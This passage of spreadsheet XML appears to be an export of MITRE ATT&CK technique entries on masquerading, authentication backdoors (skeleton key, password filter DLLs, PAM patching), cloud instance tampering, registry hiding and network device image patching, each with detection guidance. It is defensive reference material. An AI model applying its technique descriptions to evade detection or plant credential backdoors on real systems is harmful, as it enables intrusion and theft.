If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>Bartosz Jerzman; David Lu, Tripwire; Elastic; Felipe Espósito, @Pr0teus; Nick Carr, FireEye; Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>Application control by file name or path</t>
  </si>
  <si>
    <t>T1036.001</t>
  </si>
  <si>
    <t>Masquerading: Invalid Code Signature</t>
  </si>
  <si>
    <t>Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/001</t>
  </si>
  <si>
    <t>10 February 2020</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>File: File Metadata</t>
  </si>
  <si>
    <t>T1036.004</t>
  </si>
  <si>
    <t>Masquerading: Masquerade Task or Service</t>
  </si>
  <si>
    <t>Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/004</t>
  </si>
  <si>
    <t>Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Command: Command Execution, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1036.005</t>
  </si>
  <si>
    <t>Masquerading: Match Legitimate Name or Location</t>
  </si>
  <si>
    <t>Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/005</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
In containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.</t>
  </si>
  <si>
    <t>File: File Metadata, Image: Image Metadata, Process: Process Metadata</t>
  </si>
  <si>
    <t>Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1036.003</t>
  </si>
  <si>
    <t>Masquerading: Rename System Utilities</t>
  </si>
  <si>
    <t>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename &lt;code&gt;rundll32.exe&lt;/code&gt;). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/003</t>
  </si>
  <si>
    <t>If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1036.002</t>
  </si>
  <si>
    <t>Masquerading: Right-to-Left Override</t>
  </si>
  <si>
    <t>Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named &lt;code&gt;March 25 \u202Excod.scr&lt;/code&gt; will display as &lt;code&gt;March 25 rcs.docx&lt;/code&gt;. A JavaScript file named &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; will be displayed as &lt;code&gt;photo_high_resj.png&lt;/code&gt;.
A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/002</t>
  </si>
  <si>
    <t>Detection methods should include looking for common formats of RTLO characters within filenames such as &lt;code&gt;\u202E&lt;/code&gt;, &lt;code&gt;[U+202E]&lt;/code&gt;, and &lt;code&gt;%E2%80%AE&lt;/code&gt;. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.</t>
  </si>
  <si>
    <t>T1036.006</t>
  </si>
  <si>
    <t>Masquerading: Space after Filename</t>
  </si>
  <si>
    <t>Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.
For example, if there is a Mach-O executable file called &lt;code&gt;evil.bin&lt;/code&gt;, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to &lt;code&gt;evil.txt&lt;/code&gt;, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to &lt;code&gt;evil.txt &lt;/code&gt; (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/006</t>
  </si>
  <si>
    <t>It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.</t>
  </si>
  <si>
    <t>Erye Hernandez, Palo Alto Networks</t>
  </si>
  <si>
    <t>T1556</t>
  </si>
  <si>
    <t>Modify Authentication Process</t>
  </si>
  <si>
    <t>Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556</t>
  </si>
  <si>
    <t>Credential Access, Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;) and correlate then investigate the DLL files these files reference. 
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) 
Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: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t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Logon Session: Logon Session Creation, Module: Module Load, Process: OS API Execution, Process: Process Access, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Chris Ross @xorrior</t>
  </si>
  <si>
    <t>T1556.001</t>
  </si>
  <si>
    <t>Modify Authentication Process: Domain Controller Authentication</t>
  </si>
  <si>
    <t>Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. 
Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/001</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: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t>
  </si>
  <si>
    <t>File: File Modification, Logon Session: Logon Session Creation, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1556.004</t>
  </si>
  <si>
    <t>Modify Authentication Process: Network Device Authentication</t>
  </si>
  <si>
    <t>Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.  The modification includes a specific password which is implanted in the operating system image via the patch.  Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/004</t>
  </si>
  <si>
    <t>Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).</t>
  </si>
  <si>
    <t>T1556.002</t>
  </si>
  <si>
    <t>Modify Authentication Process: Password Filter DLL</t>
  </si>
  <si>
    <t>Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. 
Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. 
Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/002</t>
  </si>
  <si>
    <t>Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)</t>
  </si>
  <si>
    <t>File: File Creation, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1556.003</t>
  </si>
  <si>
    <t>Modify Authentication Process: Pluggable Authentication Modules</t>
  </si>
  <si>
    <t>Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is &lt;code&gt;pam_unix.so&lt;/code&gt;, which retrieves, sets, and verifies account authentication information in &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
Adversaries may modify components of the PAM system to create backdoors. PAM components, such as &lt;code&gt;pam_unix.so&lt;/code&gt;, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/003</t>
  </si>
  <si>
    <t>Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present)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t>
  </si>
  <si>
    <t>File: File Modification, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>George Allen, VMware Carbon Black; Scott Knight, @sdotknight, VMware Carbon Black</t>
  </si>
  <si>
    <t>T1578</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure</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</si>
  <si>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
Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Instance: Instance Creation, Instance: Instance Deletion, Instance: Instance Modification, Instance: Instance Start, Instance: Instance Stop, Snapshot: Snapshot Creation, Snapshot: Snapshot Deletion, Snapshot: Snapshot Modification, Volume: Volume Creation, Volume: Volume Deletion, Volume: Volume Modification</t>
  </si>
  <si>
    <t>T1578.002</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Create Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/002</t>
  </si>
  <si>
    <t>The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the &lt;code&gt;RunInstances&lt;/code&gt; event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances create&lt;/code&gt; to create a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>Instance: Instance Creation</t>
  </si>
  <si>
    <t>T1578.001</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Create Snapshot</t>
  </si>
  <si>
    <t>An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/001</t>
  </si>
  <si>
    <t>The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
In AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the &lt;code&gt;gcloud compute instances create&lt;/code&gt; command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the &lt;code&gt;"sourceSnapshot":&lt;/code&gt; parameter pointed to &lt;code&gt;"global/snapshots/[BOOT_SNAPSHOT_NAME]&lt;/code&gt;.(Citation: GCP - Creating and Starting a VM)</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Creation</t>
  </si>
  <si>
    <t>T1578.003</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Delete Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/003</t>
  </si>
  <si>
    <t>The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the &lt;code&gt;TerminateInstances&lt;/code&gt; event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances delete&lt;/code&gt; to delete a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>Instance: Instance Deletion</t>
  </si>
  <si>
    <t>T1578.004</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Revert Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/004</t>
  </si>
  <si>
    <t>Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Instance: Instance Modification, Instance: Instance Start, Instance: Instance Stop</t>
  </si>
  <si>
    <t>Netskope</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1112</t>
  </si>
  <si>
    <t>Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Bartosz Jerzman; David Lu, Tripwire; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1601</t>
  </si>
  <si>
    <t>Modify System Image</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</si>
  <si>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
To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601</t>
  </si>
  <si>
    <t>Most embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. 
Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.  (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)</t>
  </si>
  <si>
    <t>T1601.002</t>
  </si>
  <si>
    <t>Modify System Image: Downgrade System Image</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)
On embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.
Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601/002</t>
  </si>
  <si>
    <t xml:space="preserve">Many embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. </t>
  </si>
  <si>
    <t>T1601.001</t>
  </si>
  <si>
    <t>Modify System Image: Patch System Image</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.
To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.
To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.
